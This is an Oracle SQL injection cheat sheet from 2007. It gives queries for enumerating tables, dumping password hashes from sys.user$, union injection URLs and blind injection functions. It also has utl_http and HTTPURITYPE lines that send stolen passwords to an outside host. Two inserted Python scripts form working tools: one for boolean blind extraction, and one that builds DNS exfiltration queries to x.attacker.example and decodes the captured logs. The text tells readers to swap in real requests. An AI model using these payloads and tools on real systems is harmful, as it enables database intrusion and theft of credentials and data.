ORACLE SQL Injection Cheat Sheet

02.10.2007


Introduction

A quick and dirty Oracle SQL injection cheat sheet, to be merged into the main SQL Injection Cheat Sheet eventually. It should be enough to get you started with basic Oracle SQL injection.

ORACLE SQL Injection Notes

In Oracle every SELECT needs a FROM clause; you cannot select a bare expression the way you can in SQL Server or MySQL. For constants and function calls, select from the special one-row table DUAL.

i.e. SELECT 'dummydata' || 'x' FROM DUAL;

If you use /* comment */ style comments you have to close them; an unterminated block comment is a syntax error.

Concatenation

SELECT 'x' || 'y' FROM DUAL;
SELECT 'a' || 'b' FROM DUAL;
SELECT user || '-' || password FROM members;
SELECT utl_raw.concat('x','y') FROM DUAL;

Note : || is the string concatenation operator and works on any data that implicitly converts to a string. UTL_RAW.CONCAT operates on RAW values, so its arguments are interpreted as hex byte strings; stick to || for ordinary text.

Comments

Block comment : /* comment */

Note : A block comment has to be closed properly, otherwise you get a syntax error.

Line comment : -- (everything up to the end of the line is ignored, which is the usual way to drop the rest of the original query)

Casting

For most data types, concatenating a value with a string casts it to a string implicitly:

SELECT 1 || 'a' FROM DUAL;

Explicit conversions are also available when you need them: TO_CHAR(), TO_NUMBER(), CAST(x AS VARCHAR2(100)).

Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;   -- 'no'
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(6566)) FROM DUAL;   -- 'ef'

Note : UTL_RAW.CAST_TO_VARCHAR2 takes a RAW, so the digits you pass are read as hex byte values (65 = 'e', 66 = 'f'); a value like 110 gives you unprintable bytes, not '110'. The CHR() approach works for any character and is the one to reach for.

Getting Stuff

Getting Tables

SELECT owner, table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Note : ALL_TABLES lists the tables the current user can see. Drop the TABLESPACE_NAME filter to get all of them (application tables are not always in USERS), or query DBA_TABLES if you have the privilege.

Getting Columns

SELECT column_name, data_type FROM all_tab_columns WHERE table_name = 'TABLE-NAME'

Note : The data dictionary stores identifiers in upper case (unless they were created with quoted identifiers), so 'TABLE-NAME' has to be upper case or the query returns nothing.

Getting Current Database Name

SELECT global_name FROM global_name
OR
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM DUAL

Getting Users and Passwords

SELECT name, password FROM sys.user$ WHERE type#=1

Note : type#=1 selects users (type#=0 are roles). Reading SYS.USER$ needs SYS-level privileges; without them SELECT username FROM all_users still gives you the account names. On 11g and later also read the SPARE4 column, which holds the case-sensitive hashes; from 12c on the PASSWORD column may be empty.

Getting version

SELECT banner || '-' || (SELECT banner FROM v$version WHERE banner LIKE 'Oracle%') FROM v$version WHERE banner LIKE 'TNS%'
OR, for just the database banner,
SELECT banner FROM v$version WHERE ROWNUM = 1

Getting Current User

SELECT user FROM dual

Simple Union Query

http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL

Note : -101 is just a value that matches no row in the original query, so only the injected row comes back. The UNION SELECT must have the same number of columns as the original query and compatible types in each position; pad with NULL (or typed constants such as 1 or 'a') until the error goes away.

Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;

Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Note : ROWNUM is assigned before ORDER BY is applied and cannot be tested with > or = directly in the outer query, hence the subquery. If you need a stable order between requests, sort in the innermost query:

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM (SELECT FIRST_NAME FROM hr.employees ORDER BY FIRST_NAME)) WHERE R = 3;

Functions useful for Blind SQL Injection

  • BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds (time-based blind injection)
  • CHR() - Convert a number to a character
  • ASCII() - Convert a character to its code
  • SUBSTR() - Substring (extract one character at a time)
  • BITAND() - Bitwise AND (extract one bit at a time)
  • LOWER() - Convert to lower case

Note : DBMS_LOCK.SLEEP is a PL/SQL procedure, so it cannot be called inside a plain SELECT; it needs a PL/SQL block (or a stored function that wraps it) and EXECUTE on DBMS_LOCK, which is not granted to PUBLIC by default. ASCII(NULL) and BITAND(NULL, n) are NULL, so a probe past the end of the string is never true, which is how you detect the end.
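Putting the functions above together, the following is an added example (not code from the original cheat sheet) of boolean-based blind extraction against an Oracle back end. It builds the Oracle predicates with ASCII()/SUBSTR()/BITAND(), shows both the binary-search and the bit-by-bit strategy (7 requests per character either way), and stops on Oracle's NULL semantics past the end of the string. The probe it runs against is a constructed stand-in that answers for a fixed secret; in a real test it would be the HTTP request whose response you classify as true or false. The parameter name, the secret and the `SELECT user FROM dual` target are assumptions.

```python
"""Boolean-based blind extraction from an Oracle back end.

Added example, not from the original cheat sheet. It builds Oracle
predicates from the functions listed above (ASCII, SUBSTR, BITAND) and
drives them with a probe callback. The probe used here is a constructed
stand-in that answers for a fixed secret; in a real test it is an HTTP
request whose response is classified as true or false.
"""
import re
from typing import Callable

SECRET = "SCOTT"    # constructed: what "SELECT user FROM dual" would return

def ascii_predicate(subquery: str, pos: int, value: int) -> str:
    """Is the byte at 1-based `pos` of the subquery result greater than `value`?
    Past the end SUBSTR yields NULL, ASCII(NULL) is NULL and the comparison
    is never true, which the extractors use as the end-of-string signal."""
    return f"ASCII(SUBSTR(({subquery}),{pos},1))>{value}"

def bitand_predicate(subquery: str, pos: int, bit: int) -> str:
    """Is bit `bit` (0 = least significant) set in the byte at `pos`?"""
    mask = 1 << bit
    return f"BITAND(ASCII(SUBSTR(({subquery}),{pos},1)),{mask})={mask}"

def injected_fragment(predicate: str) -> str:
    """What gets appended to a numeric parameter: id=101 AND <pred>-- ."""
    return f" AND {predicate}--"

Probe = Callable[[str], bool]

def extract_binary_search(probe: Probe, subquery: str, max_len: int = 64) -> str:
    """Binary search over 0..127, 7 probes per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                       # byte value lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(injected_fragment(ascii_predicate(subquery, pos, mid))):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                           # NULL: past the end of the string
            break
        out += chr(lo)
    return out

def extract_bitwise(probe: Probe, subquery: str, max_len: int = 64) -> str:
    """Same result bit by bit with BITAND, also 7 probes per character."""
    out = ""
    for pos in range(1, max_len + 1):
        byte = 0
        for bit in range(6, -1, -1):
            if probe(injected_fragment(bitand_predicate(subquery, pos, bit))):
                byte |= 1 << bit
        if byte == 0:                         # BITAND(NULL, m) = NULL: end
            break
        out += chr(byte)
    return out

# Constructed stand-in for the vulnerable application ------------------------
_ASCII_RE = re.compile(r"ASCII\(SUBSTR\(\((.+)\),(\d+),1\)\)>(\d+)")
_BIT_RE = re.compile(r"BITAND\(ASCII\(SUBSTR\(\((.+)\),(\d+),1\)\),(\d+)\)=(\d+)")

def fake_probe(fragment: str) -> bool:
    """Evaluates the two predicate shapes above against SECRET with Oracle's
    NULL semantics. Replace with a function that sends the fragment in the
    vulnerable parameter and returns True when the 'row found' page comes back."""
    if not (fragment.startswith(" AND ") and fragment.endswith("--")):
        raise ValueError("unexpected fragment: " + fragment)
    pred = fragment[5:-2]
    if (m := _ASCII_RE.fullmatch(pred)):
        pos, value = int(m.group(2)), int(m.group(3))
        return pos <= len(SECRET) and ord(SECRET[pos - 1]) > value
    if (m := _BIT_RE.fullmatch(pred)):
        pos, mask, want = int(m.group(2)), int(m.group(3)), int(m.group(4))
        return pos <= len(SECRET) and (ord(SECRET[pos - 1]) & mask) == want
    raise ValueError("unexpected predicate: " + pred)

def probe_count(extractor, subquery: str) -> int:
    """Number of requests an extractor needs: 7 per character, plus 7 for
    the terminating position that comes back NULL."""
    n = 0
    def counting(fragment: str) -> bool:
        nonlocal n
        n += 1
        return fake_probe(fragment)
    extractor(counting, subquery)
    return n

if __name__ == "__main__":
    q = "SELECT user FROM dual"
    print(injected_fragment(ascii_predicate(q, 1, 64)))
    print(extract_binary_search(fake_probe, q), probe_count(extract_binary_search, q))
    print(extract_bitwise(fake_probe, q), probe_count(extract_bitwise, q))
```

Both strategies cost the same number of requests; the BITAND form is handy when the application mangles comparison operators but lets function calls through. Swap `fake_probe` for a function that issues the request and returns True when the page differs from the false case.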

Doing outbound connections

  • SELECT utl_http.request('http://www.example.com') FROM DUAL
  • SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members)) FROM DUAL
  • SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;

Note : EXECUTE on UTL_HTTP is often revoked from PUBLIC, in which case HTTPURITYPE is the alternative. For a DNS channel use UTL_INADDR.GET_HOST_ADDRESS('<data>.yourdomain'), which forces a lookup that reaches your name server even when outbound HTTP is filtered.

You can exfiltrate the result of a blind SQL injection through DNS requests (more reliable against egress filtering) or through an actual web request to a host you control.
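The DNS variant, as an added example that is not part of the original cheat sheet: the database is made to resolve a host name whose labels carry the data (via UTL_INADDR.GET_HOST_ADDRESS, which needs EXECUTE on UTL_INADDR and, on 11g and later, a network ACL), and you read the value back out of your name server's query log. Both sides are shown: the injected SELECT that hex-encodes one slice of the value per request so every label stays under the 63-character DNS limit, and a decoder that reassembles out-of-order and retried lookups. The domain `x.attacker.example`, the secret value and the BIND-style log lines are constructed for the example.

```python
"""DNS-channel exfiltration for blind Oracle SQL injection.

Added example, not from the original cheat sheet. The database is made to
resolve a host name whose labels carry the data, using
UTL_INADDR.GET_HOST_ADDRESS(); the lookup reaches the name server for a
domain you control even when outbound HTTP is filtered. Two sides are
shown: building the injected SELECT that hex-encodes one slice of the
value per query, and decoding the names captured in the name server's
query log. The domain, the secret and the log lines are constructed.
"""
import re
from typing import Iterable

DOMAIN = "x.attacker.example"   # assumed: a zone whose name server you run
LABEL_BYTES = 30                # 30 raw bytes -> 60 hex chars, under the 63-char label limit

def exfil_query(subquery: str, chunk: int) -> str:
    """SELECT that resolves <chunk>.<hex slice>.<DOMAIN>.
    RAWTOHEX(UTL_RAW.CAST_TO_RAW(x)) makes any byte DNS-safe; SUBSTR picks
    the slice for this chunk (NULL once past the end, giving an empty label)."""
    start = chunk * LABEL_BYTES * 2 + 1          # SUBSTR positions are 1-based
    return (
        "SELECT UTL_INADDR.GET_HOST_ADDRESS("
        f"'{chunk}.'||SUBSTR(RAWTOHEX(UTL_RAW.CAST_TO_RAW(({subquery}))),"
        f"{start},{LABEL_BYTES * 2})||'.{DOMAIN}') FROM DUAL"
    )

# BIND-style query log: "... query: <chunk>.<hex>.<DOMAIN> IN A ..."
_QUERY_RE = re.compile(r"query: (\d+)\.([0-9A-Fa-f]*)\." + re.escape(DOMAIN) + r" IN ")

def decode_captured(log_lines: Iterable[str], charset: str = "latin-1") -> str:
    """Reassemble the value from captured lookups. Resolvers retry, so
    duplicates are expected, and chunks can arrive out of order, so they are
    keyed by index; a missing index is an error rather than a silently
    truncated result. `charset` should match the database character set."""
    chunks = {}
    for line in log_lines:
        m = _QUERY_RE.search(line)
        if not m:
            continue                                  # unrelated traffic
        idx, hexdata = int(m.group(1)), m.group(2)
        if hexdata:                                   # empty label = past the end
            chunks[idx] = bytes.fromhex(hexdata)
    if not chunks:
        return ""
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError(f"chunks not seen: {missing}")
    return b"".join(chunks[i] for i in sorted(chunks)).decode(charset)

# Constructed query-log lines, as if the injected SELECTs for chunks 0..2 ran
# against the value 'admin:s3cr3t!:2007-10-02:user2:pw' (33 bytes), with one
# retry, one out-of-order arrival and one unrelated lookup mixed in.
SAMPLE_LOG = [
    "02-Oct-2007 12:00:01.101 client 203.0.113.5#41000: query: "
    "1.3A7077.x.attacker.example IN A + (198.51.100.2)",
    "02-Oct-2007 12:00:01.102 client 203.0.113.5#41001: query: "
    "www.example.com IN A + (198.51.100.2)",
    "02-Oct-2007 12:00:01.103 client 203.0.113.5#41002: query: "
    "0.61646D696E3A733363723374213A323030372D31302D30323A7573657232.x.attacker.example IN A + (198.51.100.2)",
    "02-Oct-2007 12:00:01.104 client 203.0.113.5#41002: query: "
    "0.61646D696E3A733363723374213A323030372D31302D30323A7573657232.x.attacker.example IN A + (198.51.100.2)",
    "02-Oct-2007 12:00:01.105 client 203.0.113.5#41003: query: "
    "2..x.attacker.example IN A + (198.51.100.2)",
]

if __name__ == "__main__":
    q = "SELECT user||'-'||password FROM members"
    for c in range(3):
        print(exfil_query(q, c))
    print(decode_captured(SAMPLE_LOG))
```

Send `exfil_query(q, 0)`, `exfil_query(q, 1)`, ... until a lookup with an empty data label shows up (the SUBSTR past the end is NULL), then run the captured log through `decode_captured`. Hex encoding doubles the size but keeps every byte DNS-safe and case-insensitivity-proof; 30 bytes per request is the price.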

References, Papers & Credits

Document History

  • 02/10/2007 - Public release
  • 02/10/2007 - "Getting passwords" statement and utl_http example replaced with simpler ones. Thanks to Alexander Kornbrust
  • 09/10/2007 - Sleep function added

Comments


Nice list but some of the statements are too complicated:

e.g.
SELECT username, FROM all_users UNION SELECT name, password FROM sys.user$
better: SELECT name, password FROM sys.user$ where type#=1

or
use httpuritype instead of utl_http. utl_http is often removed from public. httpuritype works also and is not flagged by IDS:
SELECT HTTPURITYPE('http://www.red-database-security.com').getXML() FROM DUAL;

Alexander Kornbrust [ # | 02.10.2007 ]

Alexander,
Thanks for your comments. I'm quite new to Oracle stuff. I have updated the list according to your comments.

Ferruh Mavituna [ # | 02.10.2007 ]



Ferruh Mavituna
© 2002-2007, Ferruh Mavituna
